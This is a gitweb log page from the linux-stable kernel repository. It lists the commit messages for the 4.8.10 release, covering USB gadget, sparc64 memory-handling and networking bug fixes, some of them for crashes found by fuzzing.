]> git.itanic.dy.fi Git - linux-stable/log
linux-stable
7 years agoLinux 4.8.10 v4.8.10
Greg Kroah-Hartman [Mon, 21 Nov 2016 09:11:59 +0000 (10:11 +0100)]
Linux 4.8.10

7 years agousb: gadget: f_fs: stop sleeping in ffs_func_eps_disable
Michal Nazarewicz [Tue, 4 Oct 2016 00:07:34 +0000 (02:07 +0200)]
usb: gadget: f_fs: stop sleeping in ffs_func_eps_disable

commit a9e6f83c2df199187a5248f824f31b6787ae23ae upstream.

ffs_func_eps_disable is called from atomic context so it cannot sleep
thus cannot grab a mutex.  Change the handling of epfile->read_buffer
to use non-sleeping synchronisation method.

Reported-by: Chen Yu <chenyu56@huawei.com>
Signed-off-by: Michał Nazarewicz <mina86@mina86.com>
Fixes: 9353afbbfa7b ("buffer data from ‘oversized’ OUT requests")
Tested-by: John Stultz <john.stultz@linaro.org>
Tested-by: Chen Yu <chenyu56@huawei.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agousb: gadget: f_fs: edit epfile->ep under lock
Michal Nazarewicz [Tue, 4 Oct 2016 00:07:33 +0000 (02:07 +0200)]
usb: gadget: f_fs: edit epfile->ep under lock

commit 454915dde06a51133750c6745f0ba57361ba209d upstream.

epfile->ep is protected by ffs->eps_lock (not epfile->mutex) so clear it
while holding the spin lock.

Tested-by: John Stultz <john.stultz@linaro.org>
Tested-by: Chen Yu <chenyu56@huawei.com>
Signed-off-by: Michal Nazarewicz <mina86@mina86.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Delete now unused user copy fixup functions.
David S. Miller [Tue, 25 Oct 2016 04:25:31 +0000 (21:25 -0700)]
sparc64: Delete now unused user copy fixup functions.

[ Upstream commit 0fd0ff01d4c3c01e7fe69b762ee1a13236639acc ]

Now that all of the user copy routines are converted to return
accurate residual lengths when an exception occurs, we no longer need
the broken fixup routines.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Delete now unused user copy assembler helpers.
David S. Miller [Tue, 25 Oct 2016 04:22:27 +0000 (21:22 -0700)]
sparc64: Delete now unused user copy assembler helpers.

[ Upstream commit 614da3d9685b67917cab48c8452fd8bf93de0867 ]

All of __ret{,l}_mone{_asi,_fp,_asi_fpu} are now unused.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert U3copy_{from,to}_user to accurate exception reporting.
David S. Miller [Tue, 25 Oct 2016 04:20:35 +0000 (21:20 -0700)]
sparc64: Convert U3copy_{from,to}_user to accurate exception reporting.

[ Upstream commit ee841d0aff649164080e445e84885015958d8ff4 ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert NG2copy_{from,to}_user to accurate exception reporting.
David S. Miller [Tue, 25 Oct 2016 03:46:44 +0000 (20:46 -0700)]
sparc64: Convert NG2copy_{from,to}_user to accurate exception reporting.

[ Upstream commit e93704e4464fdc191f73fce35129c18de2ebf95d ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert NGcopy_{from,to}_user to accurate exception reporting.
David S. Miller [Tue, 25 Oct 2016 02:32:12 +0000 (19:32 -0700)]
sparc64: Convert NGcopy_{from,to}_user to accurate exception reporting.

[ Upstream commit 7ae3aaf53f1695877ccd5ebbc49ea65991e41f1e ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert NG4copy_{from,to}_user to accurate exception reporting.
David S. Miller [Tue, 25 Oct 2016 01:58:05 +0000 (18:58 -0700)]
sparc64: Convert NG4copy_{from,to}_user to accurate exception reporting.

[ Upstream commit 95707704800988093a9b9a27e0f2f67f5b4bf2fa ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert U1copy_{from,to}_user to accurate exception reporting.
David S. Miller [Mon, 15 Aug 2016 23:07:50 +0000 (16:07 -0700)]
sparc64: Convert U1copy_{from,to}_user to accurate exception reporting.

[ Upstream commit cb736fdbb208eb3420f1a2eb2bfc024a6e9dcada ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert GENcopy_{from,to}_user to accurate exception reporting.
David S. Miller [Mon, 15 Aug 2016 22:26:38 +0000 (15:26 -0700)]
sparc64: Convert GENcopy_{from,to}_user to accurate exception reporting.

[ Upstream commit d0796b555ba60c22eb41ae39a8362156cb08eee9 ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Convert copy_in_user to accurate exception reporting.
David S. Miller [Mon, 15 Aug 2016 22:08:18 +0000 (15:08 -0700)]
sparc64: Convert copy_in_user to accurate exception reporting.

[ Upstream commit 0096ac9f47b1a2e851b3165d44065d18e5f13d58 ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Prepare to move to more saner user copy exception handling.
David S. Miller [Mon, 15 Aug 2016 21:47:54 +0000 (14:47 -0700)]
sparc64: Prepare to move to more saner user copy exception handling.

[ Upstream commit 83a17d2661674d8c198adc0e183418f72aabab79 ]

The fixup helper function mechanism for handling user copy fault
handling is not %100 accurrate, and can never be made so.

We are going to transition the code to return the running return
return length, which is always kept track in one or more registers
of each of these routines.

In order to convert them one by one, we have to allow the existing
behavior to continue functioning.

Therefore make all the copy code that wants the fixup helper to be
used return negative one.

After all of the user copy routines have been converted, this logic
and the fixup helpers themselves can be removed completely.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Delete __ret_efault.
David S. Miller [Wed, 10 Aug 2016 21:41:33 +0000 (14:41 -0700)]
sparc64: Delete __ret_efault.

[ Upstream commit aa95ce361ed95c72ac42dcb315166bce5cf1a014 ]

It is completely unused.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Handle extremely large kernel TLB range flushes more gracefully.
David S. Miller [Thu, 27 Oct 2016 16:04:54 +0000 (09:04 -0700)]
sparc64: Handle extremely large kernel TLB range flushes more gracefully.

[ Upstream commit a74ad5e660a9ee1d071665e7e8ad822784a2dc7f ]

When the vmalloc area gets fragmented, and because the firmware
mapping area sits between where modules live and the vmalloc area, we
can sometimes receive requests for enormous kernel TLB range flushes.

When this happens the cpu just spins flushing billions of pages and
this triggers the NMI watchdog and other problems.

We took care of this on the TSB side by doing a linear scan of the
table once we pass a certain threshold.

Do something similar for the TLB flush, however we are limited by
the TLB flush facilities provided by the different chip variants.

First of all we use an (mostly arbitrary) cut-off of 256K which is
about 32 pages.  This can be tuned in the future.

The huge range code path for each chip works as follows:

1) On spitfire we flush all non-locked TLB entries using diagnostic
   acceses.

2) On cheetah we use the "flush all" TLB flush.

3) On sun4v/hypervisor we do a TLB context flush on context 0, which
   unlike previous chips does not remove "permanent" or locked
   entries.

We could probably do something better on spitfire, such as limiting
the flush to kernel TLB entries or even doing range comparisons.
However that probably isn't worth it since those chips are old and
the TLB only had 64 entries.

Reported-by: James Clarke <jrtc27@jrtc27.com>
Tested-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Fix illegal relative branches in hypervisor patched TLB cross-call code.
David S. Miller [Wed, 26 Oct 2016 17:20:14 +0000 (10:20 -0700)]
sparc64: Fix illegal relative branches in hypervisor patched TLB cross-call code.

[ Upstream commit a236441bb69723032db94128761a469030c3fe6d ]

Just like the non-cross-call TLB flush handlers, the cross-call ones need
to avoid doing PC-relative branches outside of their code blocks.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Fix instruction count in comment for __hypervisor_flush_tlb_pending.
David S. Miller [Wed, 26 Oct 2016 17:08:22 +0000 (10:08 -0700)]
sparc64: Fix instruction count in comment for __hypervisor_flush_tlb_pending.

[ Upstream commit 830cda3f9855ff092b0e9610346d110846fc497c ]

Noticed by James Clarke.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Fix illegal relative branches in hypervisor patched TLB code.
David S. Miller [Tue, 25 Oct 2016 23:23:26 +0000 (16:23 -0700)]
sparc64: Fix illegal relative branches in hypervisor patched TLB code.

[ Upstream commit b429ae4d5b565a71dfffd759dfcd4f6c093ced94 ]

When we copy code over to patch another piece of code, we can only use
PC-relative branches that target code within that piece of code.

Such PC-relative branches cannot be made to external symbols because
the patch moves the location of the code and thus modifies the
relative address of external symbols.

Use an absolute jmpl to fix this problem.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc64: Handle extremely large kernel TSB range flushes sanely.
David S. Miller [Wed, 26 Oct 2016 02:43:17 +0000 (19:43 -0700)]
sparc64: Handle extremely large kernel TSB range flushes sanely.

[ Upstream commit 849c498766060a16aad5b0e0d03206726e7d2fa4 ]

If the number of pages we are flushing is more than twice the number
of entries in the TSB, just scan the TSB table for matches rather
than probing each and every page in the range.

Based upon a patch and report by James Clarke.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosparc: Handle negative offsets in arch_jump_label_transform
James Clarke [Mon, 24 Oct 2016 18:49:25 +0000 (19:49 +0100)]
sparc: Handle negative offsets in arch_jump_label_transform

[ Upstream commit 9d9fa230206a3aea6ef451646c97122f04777983 ]

Additionally, if the offset will overflow the immediate for a ba,pt
instruction, fall back on a standard ba to get an extra 3 bits.

Signed-off-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agospi: spidev_test: fix build with musl libc
Baruch Siach [Fri, 12 Aug 2016 13:04:33 +0000 (16:04 +0300)]
spi: spidev_test: fix build with musl libc

commit 8736f8022e532a3c1d8873aac78e1113c6ffc3b9 upstream.

spidev.h uses _IOC_SIZEBITS directly. musl libc does not provide this macro
unless linux/ioctl.h is included explicitly. Fixes build failures like:

In file included from .../host/usr/arm-buildroot-linux-musleabihf/sysroot/usr/include/sys/ioctl.h:7:0,
                 from .../build/spidev_test-v3.15/spidev_test.c:20:
.../build/spidev_test-v3.15/spidev_test.c: In function ‘transfer’:
.../build/spidev_test-v3.15/spidev_test.c:75:18: error: ‘_IOC_SIZEBITS’ undeclared (first use in this function)
  ret = ioctl(fd, SPI_IOC_MESSAGE(1), &tr);
                  ^

Signed-off-by: Baruch Siach <baruch@tkos.co.il>
Signed-off-by: Mark Brown <broonie@kernel.org>
Cc: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonet: stmmac: Fix lack of link transition for fixed PHYs
Florian Fainelli [Mon, 14 Nov 2016 01:50:35 +0000 (17:50 -0800)]
net: stmmac: Fix lack of link transition for fixed PHYs

[ Upstream commit c51e424dc79e1428afc4d697cdb6a07f7af70cbf ]

Commit 52f95bbfcf72 ("stmmac: fix adjust link call in case of a switch
is attached") added some logic to avoid polling the fixed PHY and
therefore invoking the adjust_link callback more than once, since this
is a fixed PHY and link events won't be generated.

This works fine the first time, because we start with phydev->irq =
PHY_POLL, so we call adjust_link, then we set phydev->irq =
PHY_IGNORE_INTERRUPT and we stop polling the PHY.

Now, if we called ndo_close(), which calls both phy_stop() and does an
explicit netif_carrier_off(), we end up with a link down. Upon calling
ndo_open() again, despite starting the PHY state machine, we have
PHY_IGNORE_INTERRUPT set, and we generate no link event at all, so the
link is permanently down.

Fixes: 52f95bbfcf72 ("stmmac: fix adjust link call in case of a switch is attached")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Giuseppe Cavallaro <peppe.cavallaro@st.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosctp: change sk state only when it has assocs in sctp_shutdown
Xin Long [Sun, 13 Nov 2016 13:44:37 +0000 (21:44 +0800)]
sctp: change sk state only when it has assocs in sctp_shutdown

[ Upstream commit 5bf35ddfee052d44f39ebaa395d87101c8918405 ]

Now when users shutdown a sock with SEND_SHUTDOWN in sctp, even if
this sock has no connection (assoc), sk state would be changed to
SCTP_SS_CLOSING, which is not as we expect.

Besides, after that if users try to listen on this sock, kernel
could even panic when it dereference sctp_sk(sk)->bind_hash in
sctp_inet_listen, as bind_hash is null when sock has no assoc.

This patch is to move sk state change after checking sk assocs
is not empty, and also merge these two if() conditions and reduce
indent level.

Fixes: d46e416c11c8 ("sctp: sctp should change socket state when shutdown is received")
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agobnx2: Wait for in-flight DMA to complete at probe stage
Baoquan He [Sun, 13 Nov 2016 05:01:33 +0000 (13:01 +0800)]
bnx2: Wait for in-flight DMA to complete at probe stage

[ Upstream commit 6df77862f63f389df3b1ad879738e04440d7385d ]

In-flight DMA from 1st kernel could continue going in kdump kernel.
New io-page table has been created before bnx2 does reset at open stage.
We have to wait for the in-flight DMA to complete to avoid it look up
into the newly created io-page table at probe stage.

Suggested-by: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: Baoquan He <bhe@redhat.com>
Acked-by: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoRevert "bnx2: Reset device during driver initialization"
Baoquan He [Sun, 13 Nov 2016 05:01:32 +0000 (13:01 +0800)]
Revert "bnx2: Reset device during driver initialization"

[ Upstream commit 5d0d4b91bf627f14f95167b738d524156c9d440b ]

This reverts commit 3e1be7ad2d38c6bd6aeef96df9bd0a7822f4e51c.

When people build bnx2 driver into kernel, it will fail to detect
and load firmware because firmware is contained in initramfs and
initramfs has not been uncompressed yet during do_initcalls. So
revert commit 3e1be7a and work out a new way in the later patch.

Signed-off-by: Baoquan He <bhe@redhat.com>
Acked-by: Paul Menzel <pmenzel@molgen.mpg.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agomlxsw: spectrum_router: Correctly dump neighbour activity
Arkadi Sharshevsky [Fri, 11 Nov 2016 15:34:26 +0000 (16:34 +0100)]
mlxsw: spectrum_router: Correctly dump neighbour activity

[ Upstream commit 42cdb338f40a98e6558bae35456fe86b6e90e1ef ]

The device's neighbour table is periodically dumped in order to update
the kernel about active neighbours. A single dump session may span
multiple queries, until the response carries less records than requested
or when a record (can contain up to four neighbour entries) is not full.
Current code stops the session when the number of returned records is
zero, which can result in infinite loop in case of high packet rate.

Fix this by stopping the session according to the above logic.

Fixes: c723c735fa6b ("mlxsw: spectrum_router: Periodically update the kernel's neigh table")
Signed-off-by: Arkadi Sharshevsky <arkadis@mellanox.com>
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agomlxsw: spectrum: Fix refcount bug on span entries
Yotam Gigi [Fri, 11 Nov 2016 15:34:25 +0000 (16:34 +0100)]
mlxsw: spectrum: Fix refcount bug on span entries

[ Upstream commit 2d644d4c7506646f9c4a2afceb7fd5f030bc0c9f ]

When binding port to a newly created span entry, its refcount is
initialized to zero even though it has a bound port. That leads
to unexpected behaviour when the user tries to delete that port
from the span entry.

Fix this by initializing the reference count to 1.

Also add a warning to put function.

Fixes: 763b4b70afcd ("mlxsw: spectrum: Add support in matchall mirror TC offloading")
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Reviewed-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoRevert "include/uapi/linux/atm_zatm.h: include linux/time.h"
Mike Frysinger [Fri, 11 Nov 2016 00:08:39 +0000 (19:08 -0500)]
Revert "include/uapi/linux/atm_zatm.h: include linux/time.h"

[ Upstream commit 7b5b74efcca00f15c2aec1dc7175bfe34b6ec643 ]

This reverts commit cf00713a655d ("include/uapi/linux/atm_zatm.h: include
linux/time.h").

This attempted to fix userspace breakage that no longer existed when
the patch was merged.  Almost one year earlier, commit 70ba07b675b5
("atm: remove 'struct zatm_t_hist'") deleted the struct in question.

After this patch was merged, we now have to deal with people being
unable to include this header in conjunction with standard C library
headers like stdlib.h (which linux-atm does).  Example breakage:
x86_64-pc-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I../.. -I./../q2931 -I./../saal \
-I.  -DCPPFLAGS_TEST  -I../../src/include -O2 -march=native -pipe -g \
-frecord-gcc-switches -freport-bug -Wimplicit-function-declaration \
-Wnonnull -Wstrict-aliasing -Wparentheses -Warray-bounds \
-Wfree-nonheap-object -Wreturn-local-addr -fno-strict-aliasing -Wall \
-Wshadow -Wpointer-arith -Wwrite-strings -Wstrict-prototypes -c zntune.c
In file included from /usr/include/linux/atm_zatm.h:17:0,
                 from zntune.c:17:
/usr/include/linux/time.h:9:8: error: redefinition of ‘struct timespec’
 struct timespec {
        ^
In file included from /usr/include/sys/select.h:43:0,
                 from /usr/include/sys/types.h:219,
                 from /usr/include/stdlib.h:314,
                 from zntune.c:9:
/usr/include/time.h:120:8: note: originally defined here
 struct timespec
        ^

Signed-off-by: Mike Frysinger <vapier@gentoo.org>
Acked-by: Mikko Rapeli <mikko.rapeli@iki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agotcp: take care of truncations done by sk_filter()
Eric Dumazet [Thu, 10 Nov 2016 21:12:35 +0000 (13:12 -0800)]
tcp: take care of truncations done by sk_filter()

[ Upstream commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 ]

With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()

Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.

We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq

Many thanks to syzkaller team and Marco for giving us a reproducer.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoipv4: use new_gw for redirect neigh lookup
Stephen Suryaputra Lin [Thu, 10 Nov 2016 16:16:15 +0000 (11:16 -0500)]
ipv4: use new_gw for redirect neigh lookup

[ Upstream commit 969447f226b451c453ddc83cac6144eaeac6f2e3 ]

In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().

After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.

So, use the new_gw for neigh lookup.

Changes from v1:
 - use __ipv4_neigh_lookup instead (per Eric Dumazet).

Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonet: __skb_flow_dissect() must cap its return value
Eric Dumazet [Thu, 10 Nov 2016 00:04:46 +0000 (16:04 -0800)]
net: __skb_flow_dissect() must cap its return value

[ Upstream commit 34fad54c2537f7c99d07375e50cb30aa3c23bd83 ]

After Tom patch, thoff field could point past the end of the buffer,
this could fool some callers.

If an skb was provided, skb->len should be the upper limit.
If not, hlen is supposed to be the upper limit.

Fixes: a6e544b0a88b ("flow_dissector: Jump to exit code in __skb_flow_dissect")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yibin Yang <yibyang@cisco.com
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Willem de Bruijn <willemb@google.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonet: icmp_route_lookup should use rt dev to determine L3 domain
David Ahern [Mon, 7 Nov 2016 20:03:09 +0000 (12:03 -0800)]
net: icmp_route_lookup should use rt dev to determine L3 domain

[ Upstream commit 9d1a6c4ea43e48c7880c85971c17939b56832d8a ]

icmp_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have an rt.
Update icmp_route_lookup to use the rt on the skb to determine L3
domain.

Fixes: 613d09b30f8b ("net: Use VRF device index for lookups on TX")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosock: fix sendmmsg for partial sendmsg
Soheil Hassas Yeganeh [Fri, 4 Nov 2016 19:36:49 +0000 (15:36 -0400)]
sock: fix sendmmsg for partial sendmsg

[ Upstream commit 3023898b7d4aac65987bd2f485cc22390aae6f78 ]

Do not send the next message in sendmmsg for partial sendmsg
invocations.

sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.

For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.

Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.

Fixes: 228e548e6020 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agofib_trie: Correct /proc/net/route off by one error
Alexander Duyck [Fri, 4 Nov 2016 19:11:57 +0000 (15:11 -0400)]
fib_trie: Correct /proc/net/route off by one error

[ Upstream commit fd0285a39b1cb496f60210a9a00ad33a815603e7 ]

The display of /proc/net/route has had a couple issues due to the fact that
when I originally rewrote most of fib_trie I made it so that the iterator
was tracking the next value to use instead of the current.

In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.

This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key.  In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid.  With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.

Fixes: 25b97c016b26 ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonet: icmp6_send should use dst dev to determine L3 domain
David Ahern [Thu, 3 Nov 2016 23:17:26 +0000 (16:17 -0700)]
net: icmp6_send should use dst dev to determine L3 domain

[ Upstream commit 5d41ce29e3b91ef305f88d23f72b3359de329cec ]

icmp6_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have a dst set.
Update icmp6_send to use the dst on the skb to determine L3 domain.

Fixes: ca254490c8dfd ("net: Add VRF support to IPv6 stack")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agobpf: fix htab map destruction when extra reserve is in use
Daniel Borkmann [Thu, 3 Nov 2016 23:01:19 +0000 (00:01 +0100)]
bpf: fix htab map destruction when extra reserve is in use

[ Upstream commit 483bed2b0ddd12ec33fc9407e0c6e1088e77a97c ]

Commit a6ed3ea65d98 ("bpf: restore behavior of bpf_map_update_elem")
added an extra per-cpu reserve to the hash table map to restore old
behaviour from pre prealloc times. When non-prealloc is in use for a
map, then problem is that once a hash table extra element has been
linked into the hash-table, and the hash table is destroyed due to
refcount dropping to zero, then htab_map_free() -> delete_all_elements()
will walk the whole hash table and drop all elements via htab_elem_free().
The problem is that the element from the extra reserve is first fed
to the wrong backend allocator and eventually freed twice.

Fixes: a6ed3ea65d98 ("bpf: restore behavior of bpf_map_update_elem")
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosctp: assign assoc_id earlier in __sctp_connect
Marcelo Ricardo Leitner [Thu, 3 Nov 2016 19:03:41 +0000 (17:03 -0200)]
sctp: assign assoc_id earlier in __sctp_connect

[ Upstream commit 7233bc84a3aeda835d334499dc00448373caf5c0 ]

sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.

Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.

Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.

This issue doesn't exist in sctp_sendmsg() path.

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
Eric Dumazet [Thu, 3 Nov 2016 15:59:46 +0000 (08:59 -0700)]
ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped

[ Upstream commit 990ff4d84408fc55942ca6644f67e361737b3d8e ]

While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.

Fixes: ab1e0a13d7029 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoipv6: dccp: fix out of bound access in dccp_v6_err()
